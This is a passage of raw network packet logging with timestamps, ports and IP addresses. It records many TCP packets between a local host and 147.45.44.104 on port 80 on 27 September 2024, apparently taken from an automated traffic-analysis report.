                                                                                    Sep 27, 2024 00:15:14.169487953 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.169504881 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.169519901 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.169526100 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.169537067 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.169552088 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.169564962 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.169568062 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.169586897 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.169606924 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170095921 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170120001 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170135021 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170149088 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170164108 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170172930 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170181990 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170193911 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170197964 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170213938 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170226097 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170229912 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170245886 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170258999 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170260906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170278072 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170284033 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170295000 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170309067 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170312881 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170324087 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170340061 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.170357943 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.170377970 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.171056986 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171073914 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171088934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171104908 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171118975 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171120882 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.171135902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171138048 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.171154022 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171169043 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171181917 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.171185017 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171201944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171215057 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.171222925 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171237946 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171248913 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.171252966 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171271086 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.171274900 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.171327114 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.255194902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255225897 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255242109 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255275965 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.255377054 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255403042 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255418062 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255434990 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255460978 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.255578041 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255702019 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255717993 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255732059 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255748034 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255759954 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.255764961 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255783081 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255789995 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.255799055 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.255868912 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.256223917 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256238937 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256253958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256269932 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256285906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256295919 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.256300926 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256320000 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.256325960 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256345034 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256366014 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.256714106 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256730080 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256745100 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256759882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256773949 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.256777048 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256792068 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.256875992 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.256876945 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257132053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257148027 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257164955 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257179022 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257194042 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257194042 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257210016 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257213116 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257226944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257247925 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257270098 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257584095 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257599115 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257613897 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257627010 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257642984 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257652044 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257668018 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257682085 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257683992 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257702112 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.257704973 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.257745981 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.259435892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259551048 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259566069 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259601116 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.259814978 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259840012 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259855032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259869099 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259885073 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259887934 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.259903908 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.259922981 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.259968042 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259984016 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.259999990 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260021925 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260037899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260065079 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.260423899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260440111 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260453939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260468960 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260484934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260485888 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.260499954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260509014 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.260516882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260531902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260548115 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260550976 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.260562897 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.260570049 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.260601044 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261147976 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261163950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261183023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261198997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261214018 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261229992 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261235952 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261238098 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261254072 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261265993 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261271000 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261287928 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261301041 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261303902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261321068 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261341095 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261358023 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261781931 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261830091 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261846066 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261862040 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261878014 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261882067 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261894941 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.261919022 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.261941910 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262079954 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262096882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262136936 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262279034 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262295008 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262310982 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262326002 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262341976 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262357950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262362957 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262372971 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262377024 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262393951 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262403011 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262411118 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262425900 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262450933 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262454033 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262480021 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262764931 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262784958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262801886 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262811899 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262842894 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262881994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262897015 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.262959003 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.262989044 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263005018 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263020039 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263035059 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263048887 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263063908 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263079882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263082981 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.263082981 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.263103008 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263113022 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.263120890 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263161898 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.263514996 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263530970 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263551950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263556004 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.263571978 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263587952 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.263603926 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.263622046 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.343152046 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343281031 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343296051 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343312025 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343326092 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343329906 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.343342066 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343359947 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343370914 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.343400002 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.343426943 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343445063 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343478918 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.343508959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343524933 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343539953 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343554974 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343558073 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.343574047 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.343581915 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.343609095 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.344151974 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344166994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344182968 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344197989 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344213963 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344228983 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344233036 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.344247103 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344274998 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.344274998 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.344702005 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344717026 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344732046 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344743967 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.344748020 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344763994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344767094 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.344780922 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344795942 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.344820976 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.344854116 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.345192909 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345206022 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345221996 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345237970 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345251083 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.345253944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345271111 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345285892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345292091 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.345302105 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345304012 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.345349073 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.345479012 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345494032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345510006 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345524073 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345540047 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345555067 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345566034 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.345570087 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.345587015 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.346625090 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.346713066 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347115040 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:14.347520113 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347534895 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347554922 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347568035 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.347606897 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.347618103 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347632885 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347647905 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347662926 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347672939 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.347714901 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.347786903 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347877979 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347924948 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.347959995 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347975016 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.347990990 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348109961 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.348175049 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348227978 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.348253965 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348268986 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348284006 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348306894 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348309994 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:14.348323107 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348339081 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.348360062 CEST4977480192.168.2.4147.45.44.104
